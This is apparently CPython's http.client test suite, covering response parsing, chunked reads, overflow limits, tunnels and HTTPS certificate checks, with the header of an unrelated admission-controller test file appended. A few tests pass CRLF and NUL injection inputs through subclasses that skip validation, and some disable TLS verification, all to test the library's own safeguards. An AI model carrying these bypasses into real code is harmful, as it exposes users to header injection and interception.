b = bytearray(5)
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertEqual(bytes(b), b'\x00'*5)
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_negative_content_length(self):
sock = FakeSocket(
'HTTP/1.1 200 OK\r\nContent-Length: -1\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), b'Hello\r\n')
self.assertTrue(resp.isclosed())
def test_incomplete_read(self):
sock = FakeSocket('HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, b'Hello\r\n')
self.assertEqual(repr(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertEqual(str(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertTrue(resp.isclosed())
else:
self.fail('IncompleteRead expected')
def test_epipe(self):
sock = EPipeSocket(
"HTTP/1.0 401 Authorization Required\r\n"
"Content-type: text/html\r\n"
"WWW-Authenticate: Basic realm=\"example\"\r\n",
b"Content-Length")
conn = client.HTTPConnection("example.com")
conn.sock = sock
self.assertRaises(OSError,
lambda: conn.request("PUT", "/url", "body"))
resp = conn.getresponse()
self.assertEqual(401, resp.status)
self.assertEqual("Basic realm=\"example\"",
resp.getheader("www-authenticate"))
# Test lines overflowing the max line size (_MAXLINE in http.client)
def test_overflowing_status_line(self):
body = "HTTP/1.1 200 Ok" + "k" * 65536 + "\r\n"
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises((client.LineTooLong, client.BadStatusLine), resp.begin)
def test_overflowing_header_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'X-Foo: bar' + 'r' * 65536 + '\r\n\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises(client.LineTooLong, resp.begin)
def test_overflowing_header_limit_after_100(self):
body = (
'HTTP/1.1 100 OK\r\n'
'r\n' * 32768
)
resp = client.HTTPResponse(FakeSocket(body))
with self.assertRaises(client.HTTPException) as cm:
resp.begin()
# We must assert more because other reasonable errors that we
# do not want can also be HTTPException derived.
self.assertIn('got more than ', str(cm.exception))
self.assertIn('headers', str(cm.exception))
def test_overflowing_chunked_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
+ '0' * 65536 + 'a\r\n'
'hello world\r\n'
'0\r\n'
'\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
resp.begin()
self.assertRaises(client.LineTooLong, resp.read)
def test_early_eof(self):
# Test httpresponse with no \r\n termination,
body = "HTTP/1.1 200 Ok"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_error_leak(self):
# Test that the socket is not leaked if getresponse() fails
conn = client.HTTPConnection('example.com')
response = None
class Response(client.HTTPResponse):
def __init__(self, *pos, **kw):
nonlocal response
response = self # Avoid garbage collector closing the socket
client.HTTPResponse.__init__(self, *pos, **kw)
conn.response_class = Response
conn.sock = FakeSocket('Invalid status line')
conn.request('GET', '/')
self.assertRaises(client.BadStatusLine, conn.getresponse)
self.assertTrue(response.closed)
self.assertTrue(conn.sock.file_closed)
def test_chunked_extension(self):
extra = '3;foo=bar\r\n' + 'abc\r\n'
expected = chunked_expected + b'abc'
sock = FakeSocket(chunked_start + extra + last_chunk_extended + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_missing_end(self):
"""some servers may serve up a short chunked encoding stream"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk) #no terminating crlf
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_trailers(self):
"""See that trailers are read and ignored"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# we should have reached the end of the file
self.assertEqual(sock.file.read(), b"") #we read to the end
resp.close()
def test_chunked_sync(self):
"""Check that we don't read past the end of the chunked-encoding stream"""
expected = chunked_expected
extradata = "extradata"
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata.encode("ascii")) #we read to the end
resp.close()
def test_content_length_sync(self):
"""Check that we don't read past the end of the Content-Length stream"""
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readlines_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readlines(2000), [expected])
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(2000), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readline_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readline(10), expected)
self.assertEqual(resp.readline(10), b"")
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 30\r\n\r\n' + expected*3 + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(20), expected*2)
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_response_fileno(self):
# Make sure fd returned by fileno is valid.
threading = support.import_module("threading")
serv = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
self.addCleanup(serv.close)
serv.bind((HOST, 0))
serv.listen()
result = None
def run_server():
[conn, address] = serv.accept()
with conn, conn.makefile("rb") as reader:
# Read the request header until a blank line
while True:
line = reader.readline()
if not line.rstrip(b"\r\n"):
break
conn.sendall(b"HTTP/1.1 200 Connection established\r\n\r\n")
nonlocal result
result = reader.read()
thread = threading.Thread(target=run_server)
thread.start()
conn = client.HTTPConnection(*serv.getsockname())
conn.request("CONNECT", "dummy:1234")
response = conn.getresponse()
try:
self.assertEqual(response.status, client.OK)
s = socket.socket(fileno=response.fileno())
try:
s.sendall(b"proxied data\n")
finally:
s.detach()
finally:
response.close()
conn.close()
thread.join()
self.assertEqual(result, b"proxied data\n")
def test_putrequest_override_validation(self):
"""
It should be possible to override the default validation
behavior in putrequest (bpo-38216).
"""
class UnsafeHTTPConnection(client.HTTPConnection):
def _validate_path(self, url):
pass
conn = UnsafeHTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/\x00')
def test_putrequest_override_encoding(self):
"""
It should be possible to override the default encoding
to transmit bytes in another encoding even if invalid
(bpo-36274).
"""
class UnsafeHTTPConnection(client.HTTPConnection):
def _encode_request(self, str_url):
return str_url.encode('utf-8')
conn = UnsafeHTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/☃')
def test_putrequest_override_host_validation(self):
class UnsafeHTTPConnection(client.HTTPConnection):
def _validate_host(self, url):
pass
conn = UnsafeHTTPConnection('example.com\r\n')
conn.sock = FakeSocket('')
# set skip_host so a ValueError is not raised upon adding the
# invalid URL as the value of the "Host:" header
conn.putrequest('GET', '/', skip_host=1)
class ExtendedReadTest(TestCase):
"""
Test peek(), read1(), readline()
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'\r\n'
'hello world!\n'
'and now \n'
'for something completely different\n'
'foo'
)
lines_expected = lines[lines.find('hello'):].encode("ascii")
lines_chunked = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
def setUp(self):
sock = FakeSocket(self.lines)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
resp.fp = io.BufferedReader(resp.fp)
self.resp = resp
def test_peek(self):
resp = self.resp
# patch up the buffered peek so that it returns not too much stuff
oldpeek = resp.fp.peek
def mypeek(n=-1):
p = oldpeek(n)
if n >= 0:
return p[:n]
return p[:10]
resp.fp.peek = mypeek
all = []
while True:
# try a short peek
p = resp.peek(3)
if p:
self.assertGreater(len(p), 0)
# then unbounded peek
p2 = resp.peek()
self.assertGreaterEqual(len(p2), len(p))
self.assertTrue(p2.startswith(p))
next = resp.read(len(p2))
self.assertEqual(next, p2)
else:
next = resp.read()
self.assertFalse(next)
all.append(next)
if not next:
break
self.assertEqual(b"".join(all), self.lines_expected)
def test_readline(self):
resp = self.resp
self._verify_readline(self.resp.readline, self.lines_expected)
def _verify_readline(self, readline, expected):
all = []
while True:
# short readlines
line = readline(5)
if line and line != b"foo":
if len(line) < 5:
self.assertTrue(line.endswith(b"\n"))
all.append(line)
if not line:
break
self.assertEqual(b"".join(all), expected)
def test_read1(self):
resp = self.resp
def r():
res = resp.read1(4)
self.assertLessEqual(len(res), 4)
return res
readliner = Readliner(r)
self._verify_readline(readliner.readline, self.lines_expected)
def test_read1_unbounded(self):
resp = self.resp
all = []
while True:
data = resp.read1()
if not data:
break
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_bounded(self):
resp = self.resp
all = []
while True:
data = resp.read1(10)
if not data:
break
self.assertLessEqual(len(data), 10)
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_0(self):
self.assertEqual(self.resp.read1(0), b"")
def test_peek_0(self):
p = self.resp.peek(0)
self.assertLessEqual(0, len(p))
class ExtendedReadTestChunked(ExtendedReadTest):
"""
Test peek(), read1(), readline() in chunked mode
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
class Readliner:
"""
a simple readline class that uses an arbitrary read function and buffering
"""
def __init__(self, readfunc):
self.readfunc = readfunc
self.remainder = b""
def readline(self, limit):
data = []
datalen = 0
read = self.remainder
try:
while True:
idx = read.find(b'\n')
if idx != -1:
break
if datalen + len(read) >= limit:
idx = limit - datalen - 1
# read more data
data.append(read)
read = self.readfunc()
if not read:
idx = 0 #eof condition
break
idx += 1
data.append(read[:idx])
self.remainder = read[idx:]
return b"".join(data)
except:
self.remainder = b"".join(data)
raise
class OfflineTest(TestCase):
def test_all(self):
# Documented objects defined in the module should be in __all__
expected = {"responses"} # Allowlist documented dict() object
# HTTPMessage, parse_headers(), and the HTTP status code constants are
# intentionally omitted for simplicity
blacklist = {"HTTPMessage", "parse_headers"}
for name in dir(client):
if name.startswith("_") or name in blacklist:
continue
module_object = getattr(client, name)
if getattr(module_object, "__module__", None) == "http.client":
expected.add(name)
self.assertCountEqual(client.__all__, expected)
def test_responses(self):
self.assertEqual(client.responses[client.NOT_FOUND], "Not Found")
def test_client_constants(self):
# Make sure we don't break backward compatibility with 3.4
expected = [
'CONTINUE',
'SWITCHING_PROTOCOLS',
'PROCESSING',
'OK',
'CREATED',
'ACCEPTED',
'NON_AUTHORITATIVE_INFORMATION',
'NO_CONTENT',
'RESET_CONTENT',
'PARTIAL_CONTENT',
'MULTI_STATUS',
'IM_USED',
'MULTIPLE_CHOICES',
'MOVED_PERMANENTLY',
'FOUND',
'SEE_OTHER',
'NOT_MODIFIED',
'USE_PROXY',
'TEMPORARY_REDIRECT',
'BAD_REQUEST',
'UNAUTHORIZED',
'PAYMENT_REQUIRED',
'FORBIDDEN',
'NOT_FOUND',
'METHOD_NOT_ALLOWED',
'NOT_ACCEPTABLE',
'PROXY_AUTHENTICATION_REQUIRED',
'REQUEST_TIMEOUT',
'CONFLICT',
'GONE',
'LENGTH_REQUIRED',
'PRECONDITION_FAILED',
'REQUEST_ENTITY_TOO_LARGE',
'REQUEST_URI_TOO_LONG',
'UNSUPPORTED_MEDIA_TYPE',
'REQUESTED_RANGE_NOT_SATISFIABLE',
'EXPECTATION_FAILED',
'UNPROCESSABLE_ENTITY',
'LOCKED',
'FAILED_DEPENDENCY',
'UPGRADE_REQUIRED',
'PRECONDITION_REQUIRED',
'TOO_MANY_REQUESTS',
'REQUEST_HEADER_FIELDS_TOO_LARGE',
'INTERNAL_SERVER_ERROR',
'NOT_IMPLEMENTED',
'BAD_GATEWAY',
'SERVICE_UNAVAILABLE',
'GATEWAY_TIMEOUT',
'HTTP_VERSION_NOT_SUPPORTED',
'INSUFFICIENT_STORAGE',
'NOT_EXTENDED',
'NETWORK_AUTHENTICATION_REQUIRED',
]
for const in expected:
with self.subTest(constant=const):
self.assertTrue(hasattr(client, const))
class SourceAddressTest(TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.source_port = support.find_unused_port()
self.serv.listen()
self.conn = None
def tearDown(self):
if self.conn:
self.conn.close()
self.conn = None
self.serv.close()
self.serv = None
def testHTTPConnectionSourceAddress(self):
self.conn = client.HTTPConnection(HOST, self.port,
source_address=('', self.source_port))
self.conn.connect()
self.assertEqual(self.conn.sock.getsockname()[1], self.source_port)
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not defined')
def testHTTPSConnectionSourceAddress(self):
self.conn = client.HTTPSConnection(HOST, self.port,
source_address=('', self.source_port))
# We don't test anything here other than the constructor not barfing as
# this code doesn't deal with setting up an active running SSL server
# for an ssl_wrapped connect() to actually return from.
class TimeoutTest(TestCase):
PORT = None
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TimeoutTest.PORT = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
def testTimeoutAttribute(self):
# This will prove that the timeout gets through HTTPConnection
# and into the socket.
# default -- use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
# no timeout -- do not use global socket default
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT,
timeout=None)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), None)
httpConn.close()
# a value
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT, timeout=30)
httpConn.connect()
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
class PersistenceTest(TestCase):
def test_reuse_reconnect(self):
# Should reuse or reconnect depending on header from server
tests = (
('1.0', '', False),
('1.0', 'Connection: keep-alive\r\n', True),
('1.1', '', True),
('1.1', 'Connection: close\r\n', False),
('1.0', 'Connection: keep-ALIVE\r\n', True),
('1.1', 'Connection: cloSE\r\n', False),
)
for version, header, reuse in tests:
with self.subTest(version=version, header=header):
msg = (
'HTTP/{} 200 OK\r\n'
'{}'
'Content-Length: 12\r\n'
'\r\n'
'Dummy body\r\n'
).format(version, header)
conn = FakeSocketHTTPConnection(msg)
self.assertIsNone(conn.sock)
conn.request('GET', '/open-connection')
with conn.getresponse() as response:
self.assertEqual(conn.sock is None, not reuse)
response.read()
self.assertEqual(conn.sock is None, not reuse)
self.assertEqual(conn.connections, 1)
conn.request('GET', '/subsequent-request')
self.assertEqual(conn.connections, 1 if reuse else 2)
def test_disconnected(self):
def make_reset_reader(text):
"""Return BufferedReader that raises ECONNRESET at EOF"""
stream = io.BytesIO(text)
def readinto(buffer):
size = io.BytesIO.readinto(stream, buffer)
if size == 0:
raise ConnectionResetError()
return size
stream.readinto = readinto
return io.BufferedReader(stream)
tests = (
(io.BytesIO, client.RemoteDisconnected),
(make_reset_reader, ConnectionResetError),
)
for stream_factory, exception in tests:
with self.subTest(exception=exception):
conn = FakeSocketHTTPConnection(b'', stream_factory)
conn.request('GET', '/eof-response')
self.assertRaises(exception, conn.getresponse)
self.assertIsNone(conn.sock)
# HTTPConnection.connect() should be automatically invoked
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
def test_100_close(self):
conn = FakeSocketHTTPConnection(
b'HTTP/1.1 100 Continue\r\n'
b'\r\n'
# Missing final response
)
conn.request('GET', '/', headers={'Expect': '100-continue'})
self.assertRaises(client.RemoteDisconnected, conn.getresponse)
self.assertIsNone(conn.sock)
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
class HTTPSTest(TestCase):
def setUp(self):
if not hasattr(client, 'HTTPSConnection'):
self.skipTest('ssl support required')
def make_server(self, certfile):
from test.ssl_servers import make_https_server
return make_https_server(self, certfile=certfile)
def test_attributes(self):
# simple test to check it's storing the timeout
h = client.HTTPSConnection(HOST, TimeoutTest.PORT, timeout=30)
self.assertEqual(h.timeout, 30)
def test_networked(self):
# Default settings: requires a valid cert from a trusted CA
import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
h = client.HTTPSConnection('self-signed.pythontest.net', 443)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_networked_noverification(self):
# Switch off cert verification
import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
context = ssl._create_unverified_context()
h = client.HTTPSConnection('self-signed.pythontest.net', 443,
context=context)
h.request('GET', '/')
resp = h.getresponse()
h.close()
self.assertIn('nginx', resp.getheader('server'))
resp.close()
@support.system_must_validate_cert
def test_networked_trusted_by_default_cert(self):
# Default settings: requires a valid cert from a trusted CA
support.requires('network')
with support.transient_internet('www.python.org'):
h = client.HTTPSConnection('www.python.org', 443)
h.request('GET', '/')
resp = h.getresponse()
content_type = resp.getheader('content-type')
resp.close()
h.close()
self.assertIn('text/html', content_type)
def test_networked_good_cert(self):
# We feed the server's cert as a validating cert
import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERT_selfsigned_pythontestdotnet)
h = client.HTTPSConnection('self-signed.pythontest.net', 443, context=context)
h.request('GET', '/')
resp = h.getresponse()
server_string = resp.getheader('server')
resp.close()
h.close()
self.assertIn('nginx', server_string)
def test_networked_bad_cert(self):
# We feed a "CA" cert that is unrelated to the server's cert
import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('self-signed.pythontest.net', 443, context=context)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_unknown_cert(self):
# The custom cert isn't known to the default trust bundle
import ssl
server = self.make_server(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_good_hostname(self):
# The (valid) cert validates the HTTP hostname
import ssl
server = self.make_server(CERT_localhost)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port, context=context)
self.addCleanup(h.close)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.addCleanup(resp.close)
self.assertEqual(resp.status, 404)
def test_local_bad_hostname(self):
# The (valid) cert doesn't validate the HTTP hostname
import ssl
server = self.make_server(CERT_fakehostname)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(CERT_fakehostname)
h = client.HTTPSConnection('localhost', server.port, context=context)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# Same with explicit check_hostname=True
h = client.HTTPSConnection('localhost', server.port, context=context,
check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# With check_hostname=False, the mismatching is ignored
context.check_hostname = False
h = client.HTTPSConnection('localhost', server.port, context=context,
check_hostname=False)
h.request('GET', '/nonexistent')
resp = h.getresponse()
resp.close()
h.close()
self.assertEqual(resp.status, 404)
# The context's check_hostname setting is used if one isn't passed to
# HTTPSConnection.
context.check_hostname = False
h = client.HTTPSConnection('localhost', server.port, context=context)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.assertEqual(resp.status, 404)
resp.close()
h.close()
# Passing check_hostname to HTTPSConnection should override the
# context's setting.
h = client.HTTPSConnection('localhost', server.port, context=context,
check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not available')
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPSConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:443", "www.python.org", 443),
("www.python.org:", "www.python.org", 443),
("www.python.org", "www.python.org", 443),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 443),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b",
443)):
c = client.HTTPSConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
class RequestBodyTest(TestCase):
"""Test cases where a request includes a message body."""
def setUp(self):
self.conn = client.HTTPConnection('example.com')
self.conn.sock = self.sock = FakeSocket("")
self.conn.sock = self.sock
def get_headers_and_fp(self):
f = io.BytesIO(self.sock.data)
f.readline() # read the request line
message = client.parse_headers(f)
return message, f
def test_manual_content_length(self):
# Set an incorrect content-length so that we can verify that
# it will not be over-ridden by the library.
self.conn.request("PUT", "/url", "body",
{"Content-Length": "42"})
message, f = self.get_headers_and_fp()
self.assertEqual("42", message.get("content-length"))
self.assertEqual(4, len(f.read()))
def test_ascii_body(self):
self.conn.request("PUT", "/url", "body")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("4", message.get("content-length"))
self.assertEqual(b'body', f.read())
def test_latin1_body(self):
self.conn.request("PUT", "/url", "body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_bytes_body(self):
self.conn.request("PUT", "/url", b"body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_file_body(self):
self.addCleanup(support.unlink, support.TESTFN)
with open(support.TESTFN, "w") as f:
f.write("body")
with open(support.TESTFN) as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("4", message.get("content-length"))
self.assertEqual(b'body', f.read())
def test_binary_file_body(self):
self.addCleanup(support.unlink, support.TESTFN)
with open(support.TESTFN, "wb") as f:
f.write(b"body\xc1")
with open(support.TESTFN, "rb") as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
class HTTPResponseTest(TestCase):
def setUp(self):
body = "HTTP/1.1 200 Ok\r\nMy-Header: first-value\r\nMy-Header: \
second-value\r\n\r\nText"
sock = FakeSocket(body)
self.resp = client.HTTPResponse(sock)
self.resp.begin()
def test_getting_header(self):
header = self.resp.getheader('My-Header')
self.assertEqual(header, 'first-value, second-value')
header = self.resp.getheader('My-Header', 'some default')
self.assertEqual(header, 'first-value, second-value')
def test_getting_nonexistent_header_with_string_default(self):
header = self.resp.getheader('No-Such-Header', 'default-value')
self.assertEqual(header, 'default-value')
def test_getting_nonexistent_header_with_iterable_default(self):
header = self.resp.getheader('No-Such-Header', ['default', 'values'])
self.assertEqual(header, 'default, values')
header = self.resp.getheader('No-Such-Header', ('default', 'values'))
self.assertEqual(header, 'default, values')
def test_getting_nonexistent_header_without_default(self):
header = self.resp.getheader('No-Such-Header')
self.assertEqual(header, None)
def test_getting_header_defaultint(self):
header = self.resp.getheader('No-Such-Header',default=42)
self.assertEqual(header, 42)
class TunnelTests(TestCase):
def setUp(self):
response_text = (
'HTTP/1.0 200 OK\r\n\r\n' # Reply to CONNECT
'HTTP/1.1 200 OK\r\n' # Reply to HEAD
'Content-Length: 42\r\n\r\n'
)
self.host = 'proxy.com'
self.conn = client.HTTPConnection(self.host)
self.conn._create_connection = self._create_connection(response_text)
def tearDown(self):
self.conn.close()
def _create_connection(self, response_text):
def create_connection(address, timeout=None, source_address=None):
return FakeSocket(response_text, host=address[0], port=address[1])
return create_connection
def test_set_tunnel_host_port_headers(self):
tunnel_host = 'destination.com'
tunnel_port = 8888
tunnel_headers = {'User-Agent': 'Mozilla/5.0 (compatible, MSIE 11)'}
self.conn.set_tunnel(tunnel_host, port=tunnel_port,
headers=tunnel_headers)
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertEqual(self.conn._tunnel_host, tunnel_host)
self.assertEqual(self.conn._tunnel_port, tunnel_port)
self.assertEqual(self.conn._tunnel_headers, tunnel_headers)
def test_disallow_set_tunnel_after_connect(self):
# Once connected, we shouldn't be able to tunnel anymore
self.conn.connect()
self.assertRaises(RuntimeError, self.conn.set_tunnel,
'destination.com')
def test_connect_with_tunnel(self):
self.conn.set_tunnel('destination.com')
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
# issue22095
self.assertNotIn(b'Host: destination.com:None', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
# This test should be removed when CONNECT gets the HTTP/1.1 blessing
self.assertNotIn(b'Host: proxy.com', self.conn.sock.data)
def test_connect_put_request(self):
self.conn.set_tunnel('destination.com')
self.conn.request('PUT', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
def test_tunnel_debuglog(self):
expected_header = 'X-Dummy: 1'
response_text = 'HTTP/1.0 200 OK\r\n{}\r\n\r\n'.format(expected_header)
self.conn.set_debuglevel(1)
self.conn._create_connection = self._create_connection(response_text)
self.conn.set_tunnel('destination.com')
with support.captured_stdout() as output:
self.conn.request('PUT', '/', '')
lines = output.getvalue().splitlines()
self.assertIn('header: {}'.format(expected_header), lines)
@support.reap_threads
def test_main(verbose=None):
support.run_unittest(HeaderTests, OfflineTest, HttpMethodTests,
BasicTest, TimeoutTest, PersistenceTest,
HTTPSTest, RequestBodyTest, SourceAddressTest,
HTTPResponseTest, ExtendedReadTest,
ExtendedReadTestChunked, TunnelTests)
if __name__ == '__main__':
test_main()
|
test_admission_controller.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# Tests admission control
import itertools
import logging
import os
import pytest
import re
import shutil
import sys
import threading
